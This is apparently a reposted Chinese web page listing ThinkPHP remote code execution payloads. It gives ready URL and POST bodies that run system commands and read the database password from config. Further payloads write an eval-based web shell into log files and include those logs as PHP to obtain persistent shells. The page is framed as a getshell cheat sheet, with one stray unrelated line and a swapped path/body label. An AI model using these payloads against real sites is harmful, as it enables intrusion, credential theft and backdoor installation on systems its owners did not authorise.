thinkPHP命令执行漏洞--688IT编程网

thinkPHP命令执⾏漏洞

thinkPHP中反斜杠的作⽤是类库\命名空间

命令执⾏的姿势

通过反射invokefunction调⽤call_user_func_array⽅法，call_user_func_array函数接受两个参数，第⼀个为函数名，第⼆个为函数参数数组，如下所⽰，通过call_user_func_array函数调⽤system执⾏whoami函数

ueditor漏洞php如何解决

s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

执⾏php代码

s=index/\think\Request/input&filter=phpinfo&data=1

获取当前数据库名称

s=index/think\config/get&name=database.hostname

获取当前数据库密码

s=index/think\config/get&name=database.password

执⾏php代码

s=index/\think\view\driver\Php/display&content=<php%20phpinfo();>

执⾏php代码

s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

执⾏php代码

s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

执⾏php代码

s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

执⾏php代码

s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

getshell的姿势

写⼊getshell (file_put_contents应该也⾏)

s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<php%20phpinfo();>

使⽤echo写⼊shell

s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=copy('','test.php')

⼀种新的⽅法

先判断以下代码是否能正常回显

使⽤post⽅法请求

请求路径：index.php?s=captcha

请求实体：_method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo

写⼊shell到⽇志中

post请求

请求路径：index.php?s=captcha

请求实体：_method=__construct&method=get&filter[]=call_user_func&server[]=-1&get[]=<?php eval($_POST[cmd]); ?>

使⽤⽂件包含将⽇志⽂件可当作php⽂件进⾏执⾏(注意⽇志⽂件路径和名称)

post请求

请求路径：index.php?s=captcha

请求实体：_method=__construct&method=get&filter[]=think\__include_file&server[]=-1&get[]=./runtime/log/201905/04.log

通过⼀句话copy新⼀句话⽂件(echo)

post请求

请求实体：index.php?s=captcha

请求路径：_method=__construct&method=get&filter[]=think\__include_file&server[]=-1&get[]=./runtime/log/201905/04.log&cmd=echo copy("","/web绝对路径/2.php");

688IT编程网

thinkPHP命令执行漏洞

发表评论

推荐文章

随机森林算法介绍及R语言实现

基于随机森林优化的神经网络算法在冬小麦产量预测中的应用研究_百度文 ...

基于正则化贪心森林算法的情感分析方法研究

随机森林算法和grandientboosting算法

基于随机森林的图像分类算法研究

热门文章

随机森林特征选择原理

自动驾驶系统中的随机森林算法解析

随机森林算法及其在生物信息学中的应用

监督学习中的随机森林算法解析(六)

随机森林算法在数据分析中的应用

机器学习——随机森林,RandomForestClassifier参数含义详解

随机森林的算法

随机森林算法作用

监督学习中的随机森林算法解析(十)

随机森林算法案例

随机森林案例

二分类问题常用的模型

绘制ssd框架训练流程

一种基于信息熵和DTW的多维时间序列相似性度量算法

SVM训练过程范文

如何使用支持向量机进行股票预测与交易分析

二分类交叉熵损失函数binary

tinybert_训练中文文本分类模型_概述说明

基于门控可形变卷积和分层Transformer的图像修复模型及其应用

人工智能开发技术的测试和评估方法

最新文章

基于随机森林的数据分类算法改进

人工智能中的智能识别与分类技术

基于人工智能技术的随机森林算法在医疗数据挖掘中的应用

随机森林回归模型的建模步骤

r语言随机森林预测模型校准曲线

《2024年随机森林算法优化研究》范文

标签列表

688IT编程网

thinkPHP命令执行漏洞

发表评论

推荐文章

随机森林算法介绍及R语言实现

基于随机森林优化的神经网络算法在冬小麦产量预测中的应用研究_百度文 ...

基于正则化贪心森林算法的情感分析方法研究

随机森林算法和grandientboosting算法

基于随机森林的图像分类算法研究

热门文章

随机森林特征选择原理

自动驾驶系统中的随机森林算法解析

随机森林算法及其在生物信息学中的应用

监督学习中的随机森林算法解析(六)

随机森林算法在数据分析中的应用

机器学习——随机森林,RandomForestClassifier参数含义详解

随机森林 的算法

随机森林算法作用

监督学习中的随机森林算法解析(十)

随机森林算法案例

随机森林案例

二分类问题常用的模型

绘制ssd框架训练流程

一种基于信息熵和DTW的多维时间序列相似性度量算法

SVM训练过程范文

如何使用支持向量机进行股票预测与交易分析

二分类交叉熵损失函数binary

tinybert_训练中文文本分类模型_概述说明

基于门控可形变卷积和分层Transformer的图像修复模型及其应用

人工智能开发技术的测试和评估方法

最新文章

基于随机森林的数据分类算法改进

人工智能中的智能识别与分类技术

基于人工智能技术的随机森林算法在医疗数据挖掘中的应用

随机森林回归模型的建模步骤

r语言随机森林预测模型校准曲线

《2024年随机森林算法优化研究》范文

标签列表

随机森林的算法